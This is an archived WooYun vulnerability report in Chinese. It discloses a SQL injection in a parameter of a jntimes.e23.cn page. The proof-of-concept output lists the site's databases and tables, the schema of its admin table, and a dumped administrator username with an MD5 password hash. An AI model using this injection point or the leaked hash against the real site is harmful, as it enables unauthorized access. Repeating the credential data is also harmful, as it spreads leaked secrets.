当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168136

漏洞标题:舜网存在sql注入漏洞(可爆管理员密码)

相关厂商:e23.cn

漏洞作者: poooooi

提交时间:2016-01-08 09:59

修复时间:2016-01-13 10:00

公开时间:2016-01-13 10:00

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入点 jntimes.e23.cn/index.php?m=content&c=index&a=show&catid=17&id=57752

详细说明:

数据库

dababase.png


数据表

table1.png


table.png


列明

column.png


用户名 密码md5加密没有深入探索

列明.png


漏洞证明:

vailable databases [3]:
[*] information_schema
[*] jntimes
[*] test
Database: jntimes
[47 tables]
+---------------------+
| ? |
| ? \x00\xff\xa0 |
| ? \x00\xff\xa0\x00 |
| ? \x00 |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201505 |
| v9_poster_201507 |
| v9_poster_201509 |
| v9_poster_201511 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_report |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_video_store |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
+---------------------+
Database: jntimes
Table: v9_sso_admin
[7 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| encrypt | char(6) |
| id | smallint(6) |
| ip | char(15) |
| issuper | \x07\xf9\x00 |
| lastlogin | int(10) |
| password | char(32) |
| username | char(20) |
+-----------+--------------+
Database: jntimes
Table: v9_sso_admin
[1 entry]
+---------------+----------------------------------+
| username | password |
+---------------+----------------------------------+
| jntimes_admin | 22db9d01c0941afcb7b5bfe107687fd7 |
+---------------+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 poooooi@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-13 10:00

厂商回复:

最新状态:

暂无